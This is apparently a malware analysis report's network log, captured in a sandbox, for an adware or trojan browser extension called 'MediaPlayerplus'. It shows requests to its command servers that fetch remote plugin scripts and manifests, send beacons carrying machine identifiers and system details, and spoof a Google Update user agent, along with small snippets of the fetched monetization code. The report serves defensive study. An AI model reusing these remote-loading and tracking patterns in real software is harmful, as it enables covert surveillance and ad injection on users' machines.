Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds068.am4.c
GET /plugins/mins/211.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273147"
Last-Modified: Sun, 17 Aug 2014 10:59:07 GMT
Cache-Control: max-age=64
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds041.am4.c
GET /plugins/mins/220.js?ver=23&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1413711006"
Last-Modified: Sun, 19 Oct 2014 09:30:06 GMT
Cache-Control: max-age=633
Content-Length: 33490
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds041.am4.c
<<< skipped >>>
GET /plugins/mins/184.js?ver=10&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403604769"
Last-Modified: Tue, 24 Jun 2014 10:12:49 GMT
Cache-Control: max-age=587
Content-Length: 1239
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
<<< skipped >>>
GET /plugins/mins/104.js?ver=12&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1407146074"
Last-Modified: Mon, 04 Aug 2014 09:54:34 GMT
Cache-Control: max-age=781
Content-Length: 919
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
GET /plugins/mins/93.js?ver=13&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403819081"
Last-Modified: Thu, 26 Jun 2014 21:44:41 GMT
Cache-Control: max-age=900
Content-Length: 951
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds040.am4.c
GET /plugins/mins/269.js?ver=1&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403007487"
Last-Modified: Tue, 17 Jun 2014 12:18:07 GMT
Cache-Control: max-age=900
Content-Length: 491
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds046.am4.c
GET /plugins/mins/246.js?ver=15&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411293500"
Last-Modified: Sun, 21 Sep 2014 09:58:20 GMT
Cache-Control: max-age=15
Content-Length: 8475
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds046.am4.c
<<< skipped >>>
GET /plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1407922596"
Last-Modified: Wed, 13 Aug 2014 09:36:36 GMT
Cache-Control: max-age=900
Content-Length: 94779
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
<<< skipped >>>
GET /monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: logs.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1413862437.dop011.am4.t,1413862437.cds058.am4.c
GIF89a.............,...........D..;..
GET /ThawteTimestampingCA.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.thawte.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "075003e67d35591a801778336e66e994:1411607711"
Last-Modified: Thu, 25 Sep 2014 01:15:11 GMT
Date: Tue, 21 Oct 2014 03:33:49 GMT
Content-Length: 341
Connection: keep-alive
Content-Type: application/pkix-crl
GET /omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1399825872"
Last-Modified: Sun, 11 May 2014 16:31:12 GMT
Cache-Control: max-age=3316
Content-Length: 229
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862436.dop012.am4.t,1413862436.cds062.am4.c
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56754"/>. <app appid="{430fd4d0-b729-4f61-aa34-91526481799d}" status="ok">. .<event status="ok"/>. </app>.</response>...
GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/ping.xml?rand=3105 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:58 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1399811336"
Last-Modified: Sun, 11 May 2014 12:28:56 GMT
Cache-Control: max-age=21600
Content-Length: 229
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862437.dop012.am4.t,1413862438.cds046.am4.s,1413862438.dop003.se1.r,1413862438.cds016.se1.p,1413862438.cds046.am4.p
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56754"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. .<event status="ok"/>. </app>.</response>...
GET /tss-ca-g2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: ts-crl.ws.symantec.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "8511e81ed9a0e75095d40bb42766b437:1413839808"
Last-Modified: Mon, 20 Oct 2014 21:16:48 GMT
Date: Tue, 21 Oct 2014 03:33:49 GMT
Content-Length: 477
Connection: keep-alive
Content-Type: application/pkix-crl
GET /plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:55 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1412095900"
Last-Modified: Tue, 30 Sep 2014 16:51:40 GMT
Cache-Control: max-age=900
Content-Length: 1706
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862435.dop013.am4.t,1413862435.cds049.am4.pr
<?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>. <Ver>102</Ver>. <ShortName>MediaPlayerplus</ShortName>. <Description>MediaPlayerEnhance Extension</Description>. <PublisherName>Freeven</PublisherName>. <HomePageLink>NA</HomePageLink>. <JSLink>hXXp://js.newdatastatsserv.com/plugin/apps/54246/js/na/ie/app_code.js</JSLink>. <GroupID>0</GroupID>. <Domain>NA</Domain>. <RunInIframe>false</RunInIframe>. <ThanksURL>NA</ThanksURL>. <EmailSignature>NA</EmailSignature>. <SettingsURL>NA</SettingsURL>. <CertifiedInstall>NA</CertifiedInstall>. <ExposeSites>NA</ExposeSites>. <RemoteFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</DisableIE>. <DisableFF>true</DisableFF>. <EnableSearchIE>false</EnableSearchIE>. <EnableSearchFF>false</EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>NA</AddressbarFFEnhanced>. <AddressbarCR>NA</AddressbarCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>. <BackgroundJS>hXXp://js.newdatastatsserv.com/plugin/apps/54246/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>2</BackgroundVer>. <Manifest>NA</Manifest>. &l
<<< skipped >>>
GET /plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:55 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1412093723"
Last-Modified: Tue, 30 Sep 2014 16:15:23 GMT
Cache-Control: max-age=496
Content-Length: 736
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862435.dop013.am4.t,1413862435.cds056.am4.c
.. /************************************************************************************. This is your Page Code. The appAPI.ready() code block will be executed on every page load.. For more information please visit our docs site: hXXp://docs.crossrider.com.*************************************************************************************/...appAPI.ready(function($) {.. //alert(appAPI.isMatchPages("*youtube*"));. //alert(appAPI.isMatchPages("*watch*"));. //alert(appAPI.isMatchPages("*hd=1*")). . if (appAPI.isMatchPages("*youtube*") && appAPI.isMatchPages("*watch*") && !appAPI.isMatchPages("*hd=1*")) {. .//alert(window.location);. window.location = window.location + "&hd=1". //alert(window.location);. }..});.....
GET /plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1412093734"
Last-Modified: Tue, 30 Sep 2014 16:15:34 GMT
Cache-Control: max-age=900
Content-Length: 432
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds042.am4.pr
../************************************************************************************. This is your background code.. For more information please visit our wiki site:. hXXp://docs.crossrider.com/#!/guide/scopes_background.*************************************************************************************/..appAPI.ready(function($) {.. // Place your code here (ideal for handling browser button, global timers, etc.)..});......
GET /plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1412093724"
Last-Modified: Tue, 30 Sep 2014 16:15:24 GMT
Cache-Control: max-age=900
Content-Length: 18161
Content-Type: text/plain; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds047.am4.pr
{.."plugins_version": 93,.."plugins_list":. [. {"id":4,"url":"hXXp://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":47,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/47.js","ver":3,"name":"resources_background","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":0,"order":30000},{"run_at":5,"order":30000}],"enabled":true},{"id":246,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/246.js","ver":15,"name":"setup","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":0,"order":5},{"run_at":1,"order":5}],"enabled":true},{"id":267,"url":"hXXp://js.newdatastatsserv.com/plugins/mins/267.js","ver":1,"name":"stats_ch","browsers":{"ie":false,"ff":false,"ch":true,"sf":false,"nv
<<< skipped >>>
GET /plugins/mins/42.js?ver=10&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1409568411"
Last-Modified: Mon, 01 Sep 2014 10:46:51 GMT
Cache-Control: max-age=900
Content-Length: 7866
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds038.am4.c
<<< skipped >>>
GET /plugins/mins/281.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403604591"
Last-Modified: Tue, 24 Jun 2014 10:09:51 GMT
Cache-Control: max-age=900
Content-Length: 483
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds064.am4.c
GET /plugins/mins/286.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403817866"
Last-Modified: Thu, 26 Jun 2014 21:24:26 GMT
Cache-Control: max-age=900
Content-Length: 975
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds064.am4.c
GET /plugins/mins/273.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263856"
Last-Modified: Sun, 13 Jul 2014 15:04:16 GMT
Cache-Control: max-age=900
Content-Length: 1047
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411293488"
Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT
Cache-Control: max-age=117
Content-Length: 1075
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
GET /plugins/mins/263.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411293476"
Last-Modified: Sun, 21 Sep 2014 09:57:56 GMT
Cache-Control: max-age=381
Content-Length: 1075
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
GET /plugins/mins/233.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273128"
Last-Modified: Sun, 17 Aug 2014 10:58:48 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds065.am4.c
GET /plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405929866"
Last-Modified: Mon, 21 Jul 2014 08:04:26 GMT
Cache-Control: max-age=900
Content-Length: 508
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862437.cds065.am4.c
appAPI.internal.monetization = appAPI.internal.monetization || {};.if (typeof appAPI.internal.monetization.plugins === "undefined") { appAPI.internal.monetization.plugins = {}; }..appAPI.internal.monetization.plugins[226] = function() {..if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId && appAPI.internal.monetization.getCampaignId) {...if (appAPI.internal.monetization.getCampaignId() == 0) {....appAPI.internal.monetization.loader.setCampaignId(1026);...}..}.};....
GET /plugins/mins/221.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404650838"
Last-Modified: Sun, 06 Jul 2014 12:47:18 GMT
Cache-Control: max-age=900
Content-Length: 413
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862437.cds065.am4.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"DOWNLOADS"}))();};....
GET /plugins/mins/195.js?ver=28&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404650834"
Last-Modified: Sun, 06 Jul 2014 12:47:14 GMT
Cache-Control: max-age=900
Content-Length: 408
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds037.am4.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"LITE"}))();};....
GET /plugins/mins/192.js?ver=9&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273151"
Last-Modified: Sun, 17 Aug 2014 10:59:11 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds037.am4.c
GET /plugins/mins/180.js?ver=12&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405846499"
Last-Modified: Sun, 20 Jul 2014 08:54:59 GMT
Cache-Control: max-age=630
Content-Length: 1383
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
<<< skipped >>>
GET /plugins/mins/102.js?ver=10&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405241400"
Last-Modified: Sun, 13 Jul 2014 08:50:00 GMT
Cache-Control: max-age=900
Content-Length: 1047
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds042.am4.c
GET /plugins/mins/91.js?ver=85&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1413792022"
Last-Modified: Mon, 20 Oct 2014 08:00:22 GMT
Cache-Control: max-age=586
Content-Length: 182280
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds040.am4.c
<<< skipped >>>
GET /stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940 HTTP/1.1
Accept: */*
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: zLFW5JNHHsEzn3gsP6/gWOmvbfdsRf6fkxH80jtB0EM9V3Bc5dmd00PwXCXPANXu
x-amz-request-id: C4261FADE2887ED2
Date: Tue, 21 Oct 2014 03:33:55 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:43 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /apps.gif?action=update&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&subid=0&zdata=0&appver=102&bgver=2&pluginsver=93&curtime=1413862438&lifetime=26&oldappver=33&oldbgver=1&oldpluginsver=27&rnd=793 HTTP/1.1
Accept: */*
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 41WsFdMcUxxYd8P8u1KxQOL8X SkUplRhAHoeylsnadbFr6Bv/KrZSxPD6ObRUqE
x-amz-request-id: 1369AB04FE01EB82
Date: Tue, 21 Oct 2014 03:33:59 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps